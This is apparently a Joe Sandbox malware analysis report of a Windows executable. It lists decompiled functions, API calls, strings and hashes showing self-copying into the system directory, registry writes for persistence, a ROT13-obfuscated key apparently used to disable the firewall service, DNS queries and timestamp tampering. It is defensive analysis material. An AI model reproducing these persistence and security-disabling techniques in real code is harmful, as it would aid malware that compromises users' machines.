Part of subcall function 0040C130: abort.MSVCRT(?,?,?,?,?,0040B0BE), ref: 0040C172

Strings

%s:%u: failed assertion `%s', xrefs: 0040B0A9
GetAtomNameA (atom, s, sizeof(s)) != 0, xrefs: 0040B0BE
w32_sharedptr->size == sizeof(W32_EH_SHARED), xrefs: 0040B097
../../gcc/gcc/config/i386/w32-shared-ptr.c, xrefs: 0040B0B0

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: AtomNameabortfflushfprintf
String ID: %s:%u: failed assertion `%s'$../../gcc/gcc/config/i386/w32-shared-ptr.c$GetAtomNameA (atom, s, sizeof(s)) != 0$w32_sharedptr->size == sizeof(W32_EH_SHARED)
API String ID: 2513348418-2696369246
Opcode ID: 055b4f41610cf93c2adfb2054d8dbcce5caf57ff53a8ecc1339ea75a1b6def78
Instruction ID: b50ba6c1e0c48ccbfb779697640dc8edf1bacce25001569c98304d8c7ef809a2
Opcode Fuzzy Hash: 055b4f41610cf93c2adfb2054d8dbcce5caf57ff53a8ecc1339ea75a1b6def78
Instruction Fuzzy Hash: E50152B0A043459BCB049F65C49426BBFE0EB98304F10C83FD999AB785D37DD8849B8E

Uniqueness

Uniqueness Score: -1.00%

Function 00403E78 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00403EC7
RegSetValueExA.ADVAPI32 ref: 00403F06
RegCloseKey.ADVAPI32 ref: 00403F17

Strings

Flfgrz\PheeragPbagebyFrg\Freivprf\FunerqNpprff, xrefs: 00403E8C
Start, xrefs: 00403EF5

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: CloseOpenValue
String ID: Flfgrz\PheeragPbagebyFrg\Freivprf\FunerqNpprff$Start
API String ID: 779948276-912140713
Opcode ID: dcaaea9c11f4157e6766c7e5053caf7e5d707b883a19b3446069e9ff389a4345
Instruction ID: 3e2d9bc1c4b7ca1d7eb8bd648e7caadb70e702096ae42ff705bea3b0919a5c49
Opcode Fuzzy Hash: dcaaea9c11f4157e6766c7e5053caf7e5d707b883a19b3446069e9ff389a4345
Instruction Fuzzy Hash: 7101DBF0808315DBD710EF25C58575EBBF4BB44348F40C96DE988A7242E7789A4C8F56

Uniqueness

Uniqueness Score: -1.00%

Function 004060AA Relevance: 7.6, APIs: 5, Instructions: 70memorystringnetworkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI ref: 004060E7
GetProcessHeap.KERNEL32 ref: 0040610A
RtlAllocateHeap.NTDLL ref: 00406122
lstrcpy.KERNEL32 ref: 00406144

Part of subcall function 004013D8: HeapFree.KERNEL32 ref: 00401410

GlobalFree.KERNEL32 ref: 00406182

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: Heap$Free$AllocateGlobalProcessQuery_lstrcpy
String ID:
API String ID: 335828720-0
Opcode ID: 75049f9c1e6ab7a7902e374c79aefef9bba92b6269765223f3d14fb366891204
Instruction ID: 11d18a1c71fde03939184ec7a539e433b17fdc1711bb96236e21141529c11046
Opcode Fuzzy Hash: 75049f9c1e6ab7a7902e374c79aefef9bba92b6269765223f3d14fb366891204
Instruction Fuzzy Hash: 5F2148B09043019BDB00EF65C58476BBBF4BF44354F10893EE894AB382E778D958CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00404690 Relevance: 7.6, APIs: 5, Instructions: 50
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00404690(char* _a4, intOrPtr _a8, char _a12) {
				void* _v12;
				void* _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				int _v40;
				char _v44;
				long _t23;
				long _t29;
				char* _t31;
				char _t32;
				void* _t33;
				void* _t35;
				intOrPtr* _t36;

				_t31 = _a4;
				_t32 = _a12;
				_t23 = RegOpenKeyExA(0x80000002, _t31, 0, 0x20006,  &_v16);
				_t35 = _t33 - 0xc;
				if(_t23 == 0) {
					L2:
					_v44 = _t32;
					L0040C310();
					_t36 = _t35 - 4;
					_v28 = _t23 + 1;
					_v32 = _t32;
					_v36 = 1;
					_v40 = 0;
					_v44 = _a8;
					 *_t36 = _v16;
					RegSetValueExA(??, ??, ??, ??, ??, ??);
					 *((intOrPtr*)(_t36 - 0x18)) = _v16;
					_t29 = RegCloseKey(??);
				} else {
					_t29 = RegOpenKeyExA(0x80000001, _t31, 0, 0x20006,  &_v16);
					_t35 = _t35 - 0x14;
					if(_t29 == 0) {
						goto L2;
					}
				}
				return _t29;
			}

APIs

RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,00403CA0), ref: 004046C0
RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403CA0), ref: 004046EE
lstrlen.KERNEL32 ref: 004046FD
RegSetValueExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403CA0), ref: 0040472B
RegCloseKey.ADVAPI32 ref: 00404739

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: Open$CloseValuelstrlen
String ID:
API String ID: 1812710942-0
Opcode ID: 73b13c2264a1e00e9fe4fc5da646dc3702ed2cfdff68836bb3d97b64fe935e54
Instruction ID: 9df0ca142f19effaadb1cf883799336216af180bd5b83d8b0879c3bebcc9d83d
Opcode Fuzzy Hash: 73b13c2264a1e00e9fe4fc5da646dc3702ed2cfdff68836bb3d97b64fe935e54
Instruction Fuzzy Hash: A711D4B0808315AFD700EF69C58535EBBF4FB84358F40892EEC9897241E37996488B92

Uniqueness

Uniqueness Score: -1.00%

Function 004028E2 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44stringsleepCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32 ref: 004028F6
lstrcat.KERNEL32 ref: 00402910
Sleep.KERNEL32 ref: 00402EC5
lstrcat.KERNEL32 ref: 00402929

Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B

Strings

admin@bigtits.com, xrefs: 00402918
L@, xrefs: 004028FE

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: lstrcat$ConnectedHandleInternetLibraryLoadModuleSleepState
String ID: L@$admin@bigtits.com
API String ID: 2287753751-2810593236
Opcode ID: 99046f5afce886c15dd2c272ce4c1a23cc7a039bac66575eec0d85a53d62dca4
Instruction ID: f8f521ecf4af99865028921a37a865861f0bf00d847523e115314e8123b3051d
Opcode Fuzzy Hash: 99046f5afce886c15dd2c272ce4c1a23cc7a039bac66575eec0d85a53d62dca4
Instruction Fuzzy Hash: 8611CE769053198BCB51EF64D9845CEBBF4EF44314F40857BE885A3240EB349698CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00404620 Relevance: 7.5, APIs: 5, Instructions: 34
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404620(CHAR* _a4, int _a8, CHAR* _a12) {
				void* _v12;
				void* _v20;
				void* _v24;
				CHAR* _v28;
				int _t13;
				CHAR* _t14;
				int _t15;
				CHAR* _t16;
				void* _t17;
				CHAR** _t20;

				_t16 = _a4;
				_t15 = _a8;
				memset(_t16, 0, _t15);
				_t13 = GetSystemDirectoryA(_t16, _t15);
				_v28 = _t16;
				L0040C310();
				_t20 = _t17 - 4;
				if( *((char*)(_t13 + _t16 - 1)) != 0x5c) {
					_v28 = 0x40f156;
					 *_t20 = _t16;
					L0040C328();
					_t20 = _t20 - 8;
				}
				_t14 = _a12;
				_v28 = _t14;
				 *_t20 = _t16;
				L0040C328();
				return _t14;
			}

0x00404628
0x0040462b
0x0040463d
0x00404649
0x00404651
0x00404654
0x00404659
0x00404661
0x00404663
0x0040466b
0x0040466e
0x00404673
0x00404673
0x00404676
0x00404679
0x0040467d
0x00404680
0x0040468e

APIs

memset.MSVCRT ref: 0040463D
GetSystemDirectoryA.KERNEL32 ref: 00404649
lstrlen.KERNEL32 ref: 00404654
lstrcat.KERNEL32 ref: 0040466E
lstrcat.KERNEL32 ref: 00404680

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: lstrcat$DirectorySystemlstrlenmemset
String ID:
API String ID: 1065462249-0
Opcode ID: 52e21126391f9f1a99804af5917ba2fff1412d2631d262131c3ca1ad05ec0486
Instruction ID: 403430f860fbc260acd97b7d31e4c447ffd2c09bc4da5a50c9a35cc548e728c4
Opcode Fuzzy Hash: 52e21126391f9f1a99804af5917ba2fff1412d2631d262131c3ca1ad05ec0486
Instruction Fuzzy Hash: F8F019B1408714DBD700BF29D98555EBFA4AB44754F40892EFC8867282D3399A588BDB

Uniqueness

Uniqueness Score: -1.00%

Function 004056D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 004056F4

Part of subcall function 00404620: memset.MSVCRT ref: 0040463D
Part of subcall function 00404620: GetSystemDirectoryA.KERNEL32 ref: 00404649
Part of subcall function 00404620: lstrlen.KERNEL32 ref: 00404654
Part of subcall function 00404620: lstrcat.KERNEL32 ref: 0040466E
Part of subcall function 00404620: lstrcat.KERNEL32 ref: 00404680

CopyFileA.KERNEL32 ref: 0040573B

Part of subcall function 004054F2: CreateFileA.KERNEL32 ref: 00405531
Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 00405574
Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 0040559A
Part of subcall function 004054F2: Sleep.KERNEL32 ref: 004055A9
Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 004055D4
Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 004055FA
Part of subcall function 004054F2: Sleep.KERNEL32 ref: 00405609
Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 00405634
Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 0040565A
Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 0040567D
Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 004056AF
Part of subcall function 004054F2: CloseHandle.KERNEL32 ref: 004056C0

Part of subcall function 0040435C: CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404399
Part of subcall function 0040435C: GetFileTime.KERNEL32 ref: 004043CD
Part of subcall function 0040435C: CloseHandle.KERNEL32 ref: 004043E5
Part of subcall function 0040435C: CreateFileA.KERNEL32 ref: 00404423
Part of subcall function 0040435C: SetFileTime.KERNEL32 ref: 00404453
Part of subcall function 0040435C: CloseHandle.KERNEL32 ref: 00404467

Strings

user32.dll, xrefs: 0040574B
tepbcl.qyy, xrefs: 004056FC

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: File$PointerWrite$CloseCreateHandle$SleepTimelstrcat$CopyDirectoryModuleNameSystemlstrlenmemset
String ID: tepbcl.qyy$user32.dll
API String ID: 3363447152-446725262
Opcode ID: 9b9ff90298bf6fb1a175ed6403cba69dd8b60486c6b5008e2fa60c792a056c04
Instruction ID: 761182c28210547fcfec4951540a2b2b9fde320736257bd646c4dd079449f565
Opcode Fuzzy Hash: 9b9ff90298bf6fb1a175ed6403cba69dd8b60486c6b5008e2fa60c792a056c04
Instruction Fuzzy Hash: D401EDF08097149AC710BF65D58529EBFF4EF84758F01886EF5C827281C7B95588CB97

Uniqueness

Uniqueness Score: -1.00%

Function 00402F2E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00402F6F
GetFileSize.KERNEL32 ref: 00402F98
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00402FAE

Strings

o7@, xrefs: 00402FBC

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: File$CloseCreateHandleSize
String ID: o7@
API String ID: 1378416451-1511109803
Opcode ID: 7affc5be1ed3ea77ba53b0a5fdcfd58173d39116c07c8aae6814327dab2883a3
Instruction ID: 007f44828535ddf31908dd088b9670435e6e0f876da8f20c920cfb81d13e3c29
Opcode Fuzzy Hash: 7affc5be1ed3ea77ba53b0a5fdcfd58173d39116c07c8aae6814327dab2883a3
Instruction Fuzzy Hash: 27014FB05083459BDB00AF75D1D935EBEF0AB5139CF004A6DE8815B2C2D3FE96488B97

Uniqueness

Uniqueness Score: -1.00%

Function 0040B740 Relevance: 6.4, APIs: 5, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040B740(intOrPtr* _a4) {
				void* _v16;
				void* _v20;
				void* _v24;
				void** _v40;
				intOrPtr* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* __ebx;
				void* __esi;
				intOrPtr _t37;
				long _t39;
				void* _t40;
				void* _t41;
				void* _t43;
				void* _t47;
				void* _t58;
				void** _t61;
				void* _t62;
				intOrPtr* _t64;
				void* _t68;
				intOrPtr* _t72;
				intOrPtr* _t76;
				long* _t77;

				_t37 =  *0x418284;
				_t72 = _a4;
				if(_t37 == 0) {
					E0040B0E0(_t37);
					_t37 =  *0x418284;
					if( *((intOrPtr*)(_t37 + 0x30)) >= 0) {
						goto L2;
					} else {
						goto L18;
					}
					L8:
					if(_t68 == 5) {
						return 5;
					} else {
						if(_t68 != 0) {
							L13:
							_t43 = 3;
							goto L14;
						} else {
							if(_t64 == 0) {
								L5:
								_t41 =  *_v24;
								_v24 = _t41;
								while(1) {
									L6:
									_t64 = 0;
									_t68 = 5;
									if(_t41 != 0) {
										_t64 =  *((intOrPtr*)(_t41 + 0x18));
										_t68 = 0;
									}
									goto L8;
								}
							} else {
								_v40 = _t61;
								_v44 = _t72;
								 *_t76 = 1;
								_v52 =  *_t72;
								_v48 =  *((intOrPtr*)(_t72 + 4));
								_v56 = 1;
								_t47 =  *_t64();
								if(1 == 6) {
									 *((intOrPtr*)(_t72 + 0xc)) = 0;
									 *((intOrPtr*)(_t72 + 0x10)) = _v24;
									_v24 = _v20;
									_t43 = E0040B6B0(_t72, _t61);
									if(_t43 == 7) {
										_t51 =  *0x418284;
										_t62 = _v24;
										if(_t51 == 0) {
											E0040B0E0(_t51);
											_t51 =  *0x418284;
										}
										if( *(_t51 + 0x30) < 0) {
											E0040B3B0(_t62, _t74);
											_t51 =  *0x418284;
										}
										_t74 =  *(_t51 + 0x30);
										if( *(_t51 + 0x30) != 0) {
											_v56 = _t62;
											 *_t76 =  *((intOrPtr*)(_t51 + 0x2c));
											if(TlsSetValue(??, ??) == 0) {
												GetLastError();
											}
										} else {
											 *((intOrPtr*)(_t51 + 0x28)) = _t62;
										}
										_t51 = _v24;
										_t76 =  *((intOrPtr*)(_v24 + 0x28));
										goto __ecx;
									}
									L14:
									return _t43;
								} else {
									if(_t47 == 8) {
										goto L5;
									} else {
										goto L13;
									}
								}
							}
						}
					}
				} else {
					if( *((intOrPtr*)(_t37 + 0x30)) < 0) {
						L18:
						E0040B3B0(_t58, _t74);
						_t37 =  *0x418284;
					}
				}
				L2:
				if( *((intOrPtr*)(_t37 + 0x30)) != 0) {
					_t39 = GetLastError();
					 *_t76 =  *((intOrPtr*)(_t37 + 0x2c));
					_t74 = _t39;
					_t40 = TlsGetValue(??);
					_t77 = _t76 - 4;
					 *_t77 = _t39;
					SetLastError(??);
					_t41 = _t40;
					_t76 = _t77 - 4;
				} else {
					_t41 =  *(_t37 + 0x28);
				}
				_v20 = _t41;
				_t61 =  &_v24;
				_v24 = _t41;
				goto L6;
			}

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93a37cc761da05d28123ec6793a1aa2a7504f56957f8d3d69b3e88f2f85eb7ef
Instruction ID: 45d732202371662b8addf3eaaaff00240ebc5fc11857fefe16626fd26bfd471c
Opcode Fuzzy Hash: 93a37cc761da05d28123ec6793a1aa2a7504f56957f8d3d69b3e88f2f85eb7ef
Instruction Fuzzy Hash: C4413A75A002058FCB44EF69D684A6AB7F5FB88310F15857ED805AB3A1D738ED01CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 0040B9C0 Relevance: 6.4, APIs: 5, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040B9C0(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v40;
				intOrPtr _t39;
				long _t41;
				void* _t42;
				void* _t43;
				void* _t47;
				void* _t54;
				void* _t64;
				intOrPtr _t73;
				intOrPtr* _t79;
				long* _t80;

				_t59 = __ebx;
				_v8 = __edi;
				_t73 = _a4;
				_v16 = __ebx;
				_v12 = __esi;
				_t39 =  *0x418284;
				if(_t39 == 0) {
					E0040B0E0(_t39);
					_t39 =  *0x418284;
					_t76 =  *(_t39 + 0x30);
					if( *(_t39 + 0x30) >= 0) {
						L2:
						if( *(_t39 + 0x30) != 0) {
							L9:
							_t41 = GetLastError();
							 *_t79 =  *((intOrPtr*)(_t39 + 0x2c));
							_t76 = _t41;
							_t42 = TlsGetValue(??);
							_t80 = _t79 - 4;
							 *_t80 = _t41;
							SetLastError(??);
							_t43 = _t42;
							_v20 = _t43;
							_v24 = _t43;
							_t79 = _t80 - 4;
							 *((intOrPtr*)(_t73 + 0xc)) = _a8;
							 *((intOrPtr*)(_t73 + 0x10)) = _a12;
							_t47 = E0040B8D0(_t73,  &_v24);
							if(_t47 != 7) {
								L4:
								return _t47;
							}
							L11:
							_t48 =  *0x418284;
							_t64 = _v24;
							if(_t48 == 0) {
								E0040B0E0(_t48);
								_t48 =  *0x418284;
							}
							if( *((intOrPtr*)(_t48 + 0x30)) < 0) {
								E0040B3B0(_t64, _t76);
								_t48 =  *0x418284;
							}
							if( *((intOrPtr*)(_t48 + 0x30)) != 0) {
								_v40 = _t64;
								 *_t79 =  *((intOrPtr*)(_t48 + 0x2c));
								if(TlsSetValue(??, ??) == 0) {
									GetLastError();
								}
							} else {
								 *((intOrPtr*)(_t48 + 0x28)) = _t64;
							}
							_t48 = _v24;
							_t79 =  *((intOrPtr*)(_v24 + 0x28));
							goto __ecx;
						}
						L3:
						_t54 =  *(_t39 + 0x28);
						_v20 = _t54;
						_v24 = _t54;
						 *((intOrPtr*)(_t73 + 0xc)) = _a8;
						 *((intOrPtr*)(_t73 + 0x10)) = _a12;
						_t47 = E0040B8D0(_t73,  &_v24);
						if(_t47 == 7) {
							goto L11;
						}
						goto L4;
					}
					L7:
					E0040B3B0(_t59, _t76);
					_t39 =  *0x418284;
					if( *(_t39 + 0x30) == 0) {
						goto L3;
					}
					goto L9;
				}
				_t76 =  *(_t39 + 0x30);
				if( *(_t39 + 0x30) < 0) {
					goto L7;
				}
				goto L2;
			}

APIs

GetLastError.KERNEL32 ref: 0040BA63
TlsGetValue.KERNEL32 ref: 0040BA6E
SetLastError.KERNEL32 ref: 0040BA7C
TlsSetValue.KERNEL32 ref: 0040BAE8
GetLastError.KERNEL32 ref: 0040BAF5

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: ErrorLast$Value
String ID:
API String ID: 1883355122-0
Opcode ID: 76128aff822269898b8914e3844feebccba58d7589f724bc458a13517587ad4f
Instruction ID: 23407aeb104a5e4d22db15432d45e4df2a3b4d44022ab58e5814b8ef13b66587
Opcode Fuzzy Hash: 76128aff822269898b8914e3844feebccba58d7589f724bc458a13517587ad4f
Instruction Fuzzy Hash: A341F8B4B006198FCB50DF69D58099ABBF4FF08310B1585BAD919AB351E734AD00CFDA

Uniqueness

Uniqueness Score: -1.00%

Function 00402E0D Relevance: 6.3, APIs: 5, Instructions: 65stringsleepCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32 ref: 00402E21
lstrcat.KERNEL32 ref: 00402E3B

Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5

lstrcat.KERNEL32 ref: 00402E63
lstrcat.KERNEL32 ref: 00402E85
Sleep.KERNEL32 ref: 00402EC5
lstrcat.KERNEL32 ref: 00402EAA

Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
String ID:
API String ID: 1562643418-0
Opcode ID: 898c4bd4d997bb76c47bea009e703a736dbde25d0b4ecf9e89ef0c3f0259d499
Instruction ID: f63abfe6bd6a6f6ba5da5a44fc92895626e452bfcf87627a9a73b7892de61845
Opcode Fuzzy Hash: 898c4bd4d997bb76c47bea009e703a736dbde25d0b4ecf9e89ef0c3f0259d499
Instruction Fuzzy Hash: 0021ECB59143048BCB10EF64D9816DEBBF0EF84314F40897FE584A3281EB389698CF96

Uniqueness

Uniqueness Score: -1.00%

Function 004048E2 Relevance: 6.0, APIs: 4, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00403C33), ref: 0040490E
RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403C33), ref: 0040493C
RegSetValueExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404974
RegCloseKey.ADVAPI32 ref: 00404982

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

